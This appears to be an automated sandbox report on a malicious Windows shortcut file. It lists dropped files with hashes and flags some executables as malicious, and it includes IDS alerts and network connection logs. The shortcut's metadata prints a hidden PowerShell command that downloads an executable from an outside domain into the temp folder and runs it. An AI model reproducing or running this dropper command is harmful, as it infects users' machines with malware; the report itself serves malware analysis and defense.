                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PDF document, version 1.7, 1 pages
                                                          Category:dropped
                                                          Size (bytes):126079
                                                          Entropy (8bit):7.943849374898452
                                                          Encrypted:false
                                                          SSDEEP:3072:491AUlpumVlx1KDctCivx/JII6GE2XAYX:7wFVlxtvxXE2XL
                                                          MD5:883B3959460633ADD1FDDEB2B3060765
                                                          SHA1:A70C7DEB8F428678A43156C08267568984D0B712
                                                          SHA-256:82C26B4F1DE6AC3DB8689BDF21D64B63837DF027F37EA6878F799B5CB4D65596
                                                          SHA-512:EFCC6208349802B6EC36DF856718AD91C63A6D13FDBA712635D84A880269C0357B009D8A710B2CFECEB77AE07B46DC9BC84F4053F4E45C56FE4778A5A464E7BF
                                                          Malicious:false
                                                          Preview:%PDF-1.7.%.....1 0 obj .<<./ColorSpace /DeviceRGB./Subtype /Image./Height 1083./Filter /FlateDecode./Type /XObject./Width 851./BitsPerComponent 8./Length 125221.>>.stream.x...e.$..q\.{..................].w..n..Cp. y...../gU...cHf_.f..]ud.-.SU.S.%I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I..*~....=.$I.$I.....W_..CH.$I.$I~.......!$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I2@|..}...{.{...[n....r.SO=....kp.-I.$I.?/....?.O?....|....{pO:I.$I.dHd...Z..b.5..K~...=.$I.$I.!..g.q.:..J..f.].7.x..tP.NN.$I.$.`!..Xc....n6h.h...o..F.)._.$I.$.`$..4.L...O.7hx...9...2._.$I.$.`...z....G........
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):55442611
                                                          Entropy (8bit):7.995576888470746
                                                          Encrypted:true
                                                          SSDEEP:1572864:LGW80LX5WJoWbgWRSgkNOXWxtQSNVcr3yxp9jdf:LG7uX5M3gbcKCzr3gd
                                                          MD5:64D055F7D6DD51C4C52A8F781BBCDC70
                                                          SHA1:893311064187577FBF1FF72B9AD1715BFA27D43B
                                                          SHA-256:24759BF786626DC098C0A9A009C9C9D427867CEDF6CE68E20C8D5A9F9F9D5328
                                                          SHA-512:081D6202401885A7ED62F278DAEFBCACDD923E13A9AAACBE2298CA5E7E6FE3D60C9A340AE84AFE934095550EFD433AD808E8177E4CB4B4166BAFF59626A748A7
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Zpc.Zpc.Zpc...`.]pc...f..pc...g.Ppc....Ypc...`.Spc...g.Kpc...f.rpc...b.Qpc.Zpb..pc.O.g.Cpc.O.a.[pc.RichZpc.........PE..d...R.<g.........."....(.....\.................@.........................................`.................................................\...x....p.......@..P"...........p..d...................................@...@............................................text............................... ..`.rdata..P*.......,..................@..@.data....S..........................@....pdata..P"...@...$..................@..@.rsrc........p......................@..@.reloc..d....p......................@..B........................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):64456
                                                          Entropy (8bit):7.748470243900274
                                                          Encrypted:false
                                                          SSDEEP:1536:sOzhJIRg5Xji0araoUBeV9aE4f2bmKF60N+92+na7RGJfx:sAICkZQ+gT4+aVG
                                                          MD5:1CEB5D0CB063290C1F66FCCFED96A220
                                                          SHA1:09B735E87DD4EF4917D2E1BCD969408C3AC099FD
                                                          SHA-256:AA278FEDF75CA629997113488D789E91F73A275575C22194C7BF7D59B30C9BC9
                                                          SHA-512:4E17A9D98C1EA9DB1F330D7475BED55A0C662CE5E546145EB8C1973FDF702571179A51BA39AA2C983F8CE42AA6EDB1A72F1A20E9F7DE78950F94076EDC9527D0
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...eD............/...........................@..............................................G@......t...............J.......................!..<....@.......0...........)..........................................................."..P...........................T10B924G............................ ..`G8MCUXOZ`.... ......................@...Z2TXZQUP.....0......................@..@SRW4MTG9.....@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6221
                                                          Entropy (8bit):3.726926529711149
                                                          Encrypted:false
                                                          SSDEEP:48:W++/scj3CFU2UZ0mj6ukvhkvklCyw2Sbyml+SSogZoYFybyml+SSogZom1:36bLCKNZjXkvhkvCCttbymyHGbymyH1
                                                          MD5:ADB86F13B82FB4B4C1BD7CF6AF3B649D
                                                          SHA1:A34625506B1891C762A61354565CA5254680E970
                                                          SHA-256:041C15DF38C7B220F3125043C7B23DCD46F264AA07F0D3390A76DCA9CC3FE2EC
                                                          SHA-512:0C2A10858C27DCE0759736490063577900418FB474482B1B516E36D9257AB5C42AC9B7A631E610E975D62D120513CBF769F88AAB121BEA64FEA572A4DE3BB38C
                                                          Malicious:false
                                                          Preview:...................................FL..................F.".. ...]...z...*.<..G..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z...|Q...G....F..G......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V.Y;u..........................B...A.p.p.D.a.t.a...B.V.1......Y9u..Roaming.@......EW.V.Y9u..........................@...R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.V.Y<u..............................M.i.c.r.o.s.o.f.t.....V.1.....EW(Y..Windows.@......EW.VEW(Y..........................r...W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.VEW.X....................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.VEW.X....................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VEW.V..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.V.YCu................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5394
                                                          Entropy (8bit):3.4947755527622553
                                                          Encrypted:false
                                                          SSDEEP:48:ulbUWT67dLXuHISbymlxSSogZoYFybyml+SSogZom1:ulABxuXbymjHGbymyH1
                                                          MD5:A9FCA49BBE448D370CAEA10586DDDB51
                                                          SHA1:B816A5E887953C61A0080773C25FC04FD82581AB
                                                          SHA-256:9A24A8635D9817423E411F9762300346620C8F3072E76F0BAD7320A47401A62B
                                                          SHA-512:9BABB673886E857840CF881014061AD6E015BA7F10A740B4FCCC33729A383A9DC28C620EA2C98155FEDD83C5F987555A2EACF29C3473E58085707F8EB5BB4686
                                                          Malicious:false
                                                          Preview:...................................FL..................F.`.. ....c"_|....|..G.......G...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........z...!. a|...".~..G....j.2......Y<u .IFHQCK~1.LNK..N......EW'Y.Y<u..........................`...I.F.h.q.c.K.a.I.o.l...l.n.k.......T...............-.......S.............S.....C:\Users\user\Desktop\IFhqcKaIol.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.................................................................................................................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5394
                                                          Entropy (8bit):3.4947755527622553
                                                          Encrypted:false
                                                          SSDEEP:48:ulbUWT67dLXuHISbymlxSSogZoYFybyml+SSogZom1:ulABxuXbymjHGbymyH1
                                                          MD5:A9FCA49BBE448D370CAEA10586DDDB51
                                                          SHA1:B816A5E887953C61A0080773C25FC04FD82581AB
                                                          SHA-256:9A24A8635D9817423E411F9762300346620C8F3072E76F0BAD7320A47401A62B
                                                          SHA-512:9BABB673886E857840CF881014061AD6E015BA7F10A740B4FCCC33729A383A9DC28C620EA2C98155FEDD83C5F987555A2EACF29C3473E58085707F8EB5BB4686
                                                          Malicious:false
                                                          Preview:...................................FL..................F.`.. ....c"_|....|..G.......G...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........z...!. a|...".~..G....j.2......Y<u .IFHQCK~1.LNK..N......EW'Y.Y<u..........................`...I.F.h.q.c.K.a.I.o.l...l.n.k.......T...............-.......S.............S.....C:\Users\user\Desktop\IFhqcKaIol.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.................................................................................................................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6221
                                                          Entropy (8bit):3.726926529711149
                                                          Encrypted:false
                                                          SSDEEP:48:W++/scj3CFU2UZ0mj6ukvhkvklCyw2Sbyml+SSogZoYFybyml+SSogZom1:36bLCKNZjXkvhkvCCttbymyHGbymyH1
                                                          MD5:ADB86F13B82FB4B4C1BD7CF6AF3B649D
                                                          SHA1:A34625506B1891C762A61354565CA5254680E970
                                                          SHA-256:041C15DF38C7B220F3125043C7B23DCD46F264AA07F0D3390A76DCA9CC3FE2EC
                                                          SHA-512:0C2A10858C27DCE0759736490063577900418FB474482B1B516E36D9257AB5C42AC9B7A631E610E975D62D120513CBF769F88AAB121BEA64FEA572A4DE3BB38C
                                                          Malicious:false
                                                          Preview:...................................FL..................F.".. ...]...z...*.<..G..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z...|Q...G....F..G......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V.Y;u..........................B...A.p.p.D.a.t.a...B.V.1......Y9u..Roaming.@......EW.V.Y9u..........................@...R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.V.Y<u..............................M.i.c.r.o.s.o.f.t.....V.1.....EW(Y..Windows.@......EW.VEW(Y..........................r...W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.VEW.X....................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.VEW.X....................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VEW.V..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.V.YCu................
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):55
                                                          Entropy (8bit):4.306461250274409
                                                          Encrypted:false
                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                          Malicious:false
                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                          File type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                          Entropy (8bit):2.9398848978889105
                                                          TrID:
                                                          • Windows Shortcut (20020/1) 100.00%
                                                          File name:IFhqcKaIol.lnk
                                                          File size:2'458 bytes
                                                          MD5:5ca10c53b0ae072b40f7f69b58e9d43e
                                                          SHA1:268367cfec3f452fbd7f33a4a00bc5cc1950a679
                                                          SHA256:7d85db4c15db793280a65ddf0f1713e88f62f0eb87f00a4b4b6c3431eff4ccb9
                                                          SHA512:5f3ca74ee3df59150955d7516c8eac8d3e08618bd531f1e1a634bdc540917db09745cee9e797eb0ca2319cba3b4844776f499d06d28ec81297d57f2f6930b38a
                                                          SSDEEP:48:8M5aMueHJQWhLwzL0KBH/KVdLXuHfaPb:8M5hHJpLyYAH/2u/a
                                                          TLSH:475135102FE60314F7B3AE3568BAA22299B77C45DE21DF4D01604A4C1472624E479F7B
                                                          File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                                          Icon Hash:72d282828e8d8dd5

                                                          General

                                                          Relative Path:..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Command Line Argument:-Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden"
                                                          Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-12-06T15:42:04.041665+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.1149706101.99.75.174443TCP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 6, 2024 15:42:02.091165066 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:02.091223955 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:02.091340065 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:02.110090971 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:02.110115051 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:03.506315947 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:03.506386995 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:03.510132074 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:03.510143042 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:03.510476112 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:03.522353888 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:03.563325882 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.041695118 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.041717052 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.041850090 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:04.041870117 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.093008995 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:04.128145933 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.128160000 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.128289938 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:04.242521048 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.242548943 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.242608070 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:04.242646933 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:04.242655993 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.274113894 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.274188042 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:04.274211884 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.290421009 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.290503025 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:04.290510893 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.320319891 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.320343971 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.320403099 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:04.320414066 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.381551027 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:04.427483082 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.427496910 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.427524090 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.427639961 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:04.427685976 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:04.443129063 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.443140984 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.443202019 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:04.443222046 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.443272114 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:04.451770067 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.451778889 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.451829910 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:04.451838970 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.451858044 CET44349706101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:04.451883078 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:04.451929092 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:04.475348949 CET49706443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:06.348294020 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:06.348352909 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:06.348418951 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:06.355671883 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:06.355686903 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:07.936335087 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:07.936451912 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:07.938765049 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:07.938776016 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:07.939028025 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:07.946074009 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:07.987339973 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.515894890 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.515933037 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.516016960 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.516045094 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.589286089 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.589404106 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.589435101 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.655514956 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.703860998 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.703887939 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.703921080 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.703965902 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.704016924 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.737237930 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.737247944 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.737268925 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.737333059 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.737368107 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.753999949 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.754009008 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.754072905 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.781893969 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.781902075 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.782008886 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.782016993 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.858608961 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.884552002 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.884568930 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.884592056 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.884613991 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.884637117 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.900778055 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.900794029 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.900821924 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.900842905 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.900887012 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.922877073 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.922887087 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.922981977 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.928261995 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.928271055 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.928318977 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.949528933 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.949549913 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.949609041 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.949620962 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.962166071 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.962194920 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.962230921 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.962236881 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.962270975 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.972970009 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.972980976 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.973021984 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:08.973026991 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:08.973051071 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:09.014101028 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:09.014189959 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:09.019045115 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:09.019108057 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:09.082876921 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:09.082952023 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:09.082967043 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:09.091417074 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:09.091490030 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:09.091497898 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:09.091519117 CET44349717101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:09.091558933 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:09.100007057 CET49717443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:20.315727949 CET49761443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:20.315761089 CET443497613.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:20.315831900 CET49761443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:20.316797018 CET49761443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:20.316811085 CET443497613.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:21.732553005 CET443497613.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:21.732947111 CET49761443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:21.732978106 CET443497613.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:21.734041929 CET443497613.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:21.734119892 CET49761443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:21.734139919 CET443497613.219.243.226192.168.2.11
                                                          Dec 6, 2024 15:42:21.734183073 CET49761443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:21.758975029 CET49761443192.168.2.113.219.243.226
                                                          Dec 6, 2024 15:42:21.759109974 CET443497613.219.243.226192.168.2.11
